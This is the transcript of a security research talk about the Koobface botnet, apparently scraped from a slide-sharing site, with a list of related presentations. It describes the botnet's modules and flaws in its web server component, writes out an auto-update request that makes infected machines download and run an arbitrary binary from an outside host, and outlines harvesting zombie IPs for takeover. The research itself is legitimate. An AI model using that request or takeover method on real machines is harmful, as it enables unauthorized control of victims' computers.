Presentation is loading. Please wait.

Presentation is loading. Please wait.

0wning the koobface botnet. intro web 2.0 botnet spreads through social networks –facebook –myspace –twitter, etc.

Published byAndrew Daniel Modified over 9 years ago

Similar presentations

Presentation on theme: "0wning the koobface botnet. intro web 2.0 botnet spreads through social networks –facebook –myspace –twitter, etc."— Presentation transcript:

1 0wning the koobface botnet

2 intro web 2.0 botnet spreads through social networks –facebook –myspace –twitter, etc.

3

4

5

6

7

8

9 koobface loader Social network (Facebook, Myspace, Twitter, etc.) spreader Personal information and credentials stealer Google accounts creator Facebook auto-registration module Search hijacker Fake AV module Web server component

10 web server component makes every koobface zombie a web server –serves the fake YouTube/Facebook pages –serves the koobface loader

11

12 what about it? installed on all koobface zombies as a system service ( webserver service) adds exemption in Windows Firewall for TCP port 80 (HTTP) reachable from the Internet

13 which means… further exposes koobface zombies to attacks from the Internet exposes the koobface botnet itself to attacks from the internet

14 what kind of attack? security holes in the web server component –buffer overflow –auto-update

15 buffer overflow

16 very long string in HTTP request

17 control of eip

18 auto-update can be used to remotely update the koobface web server binary triggered by the following web request http://ip_address_of_zombie/?newver=http:// mydomain.com/new_version.exe

19 how it auto-updates when triggered –download the new web server binary –drop and execute a batch file stop the webserver service replace the existing web server binary restart the webserver service

20 exploiting auto-update koobface blindly downloads “updated” binaries trigger auto-update to download arbitrary binaries new binary should cooperate nicely with the NT Service Controller

21 where are the targets?

22 revisiting the infection chain

23 koobface sites

24 koobface zombies create simple scripts to harvest all of the IP addresses 79,000+ zombies

25 zombie distribution

26 checklist web server vulnerabilities exploits list of targets  take over?

27 questions?

Download ppt "0wning the koobface botnet. intro web 2.0 botnet spreads through social networks –facebook –myspace –twitter, etc."

Similar presentations

Network Vulnerabilities and Attacks Dr. John Abraham UTPA.

Network Vulnerabilities and Attacks Dr. John Abraham UTPA.
Let's say we want to access domain - reliablescribe.com First we need to buy a computer We need to subscribe to an Internet Service Provider (ISP) The.

Let's say we want to access domain - reliablescribe.com First we need to buy a computer We need to subscribe to an Internet Service Provider (ISP) The.
Chapter 17: WEB COMPONENTS

Chapter 17: WEB COMPONENTS
By Hiranmayi Pai Neeraj Jain

By Hiranmayi Pai Neeraj Jain
Investigating Malicious Software Steve Romig The Ohio State University April 2002.

Investigating Malicious Software Steve Romig The Ohio State University April 2002.
Exploits Dalia Solomon. Categories Trojan Horse Attacks Trojan Horse Attacks Smurf Attack Smurf Attack Port Scan Port Scan Buffer Overflow Buffer Overflow.

Exploits Dalia Solomon. Categories Trojan Horse Attacks Trojan Horse Attacks Smurf Attack Smurf Attack Port Scan Port Scan Buffer Overflow Buffer Overflow.
Information Networking Security and Assurance Lab National Chung Cheng University 1 A Real World Attack: wu-ftp.

Information Networking Security and Assurance Lab National Chung Cheng University 1 A Real World Attack: wu-ftp.
EMU/ICT Incident Response Team Firewall Access Session Presenter: IRT TEAM Member.

EMU/ICT Incident Response Team Firewall Access Session Presenter: IRT TEAM Member.
Browser Exploitation Framework (BeEF) Lab

Browser Exploitation Framework (BeEF) Lab
Internet Information Server (IIS)

Internet Information Server (IIS)
100% Security “ The only system which is truly secure is one which is switched off and unplugged, locked in a titanium lined safe, buried in a concrete.

100% Security “ The only system which is truly secure is one which is switched off and unplugged, locked in a titanium lined safe, buried in a concrete.
1 Advanced Application and Web Filtering. 2 Common security attacks Finding a way into the network Exploiting software bugs, buffer overflows Denial of.

1 Advanced Application and Web Filtering. 2 Common security attacks Finding a way into the network Exploiting software bugs, buffer overflows Denial of.
Microsoft October 2004 Security Bulletins Briefing for Senior IT Managers updated October 20, 2004 Marcus H. Sachs, P.E. The SANS Institute October 12,

Microsoft October 2004 Security Bulletins Briefing for Senior IT Managers updated October 20, 2004 Marcus H. Sachs, P.E. The SANS Institute October 12,
Module 1: Installing Internet Information Services 5.0.

Module 1: Installing Internet Information Services 5.0.
China Science & Technology Network Computer Emergency Response Team Botnet Detection and Network Security Alert Tao JING CSTCERT,CNIC.

China Science & Technology Network Computer Emergency Response Team Botnet Detection and Network Security Alert Tao JING CSTCERT,CNIC.
Presentation by Kathleen Stoeckle All Your iFRAMEs Point to Us 17th USENIX Security Symposium (Security'08), San Jose, CA, 2008 Google Technical Report.

Presentation by Kathleen Stoeckle All Your iFRAMEs Point to Us 17th USENIX Security Symposium (Security'08), San Jose, CA, 2008 Google Technical Report.
MSIT 458 – The Chinchillas. Offense Overview Botnet taxonomies need to be updated constantly in order to remain “complete” and are only as good as their.

MSIT 458 – The Chinchillas. Offense Overview Botnet taxonomies need to be updated constantly in order to remain “complete” and are only as good as their.
2010.11.22 資安新聞簡報 報告者:劉旭哲、曾家雄. Spam down, but malware up 報告者:劉旭哲.

資安新聞簡報 報告者:劉旭哲、曾家雄. Spam down, but malware up 報告者:劉旭哲.
Niels Provos and Panayiotis Mavrommatis Google Google Inc. Moheeb Abu Rajab and Fabian Monrose Johns Hopkins University 17 th USENIX Security Symposium.

Niels Provos and Panayiotis Mavrommatis Google Google Inc. Moheeb Abu Rajab and Fabian Monrose Johns Hopkins University 17 th USENIX Security Symposium.
1 All Your iFRAMEs Point to Us Mike Burry. 2 Drive-by downloads Malicious code (typically Javascript) Downloaded without user interaction (automatic),

1 All Your iFRAMEs Point to Us Mike Burry. 2 Drive-by downloads Malicious code (typically Javascript) Downloaded without user interaction (automatic),

Similar presentations

Ads by Google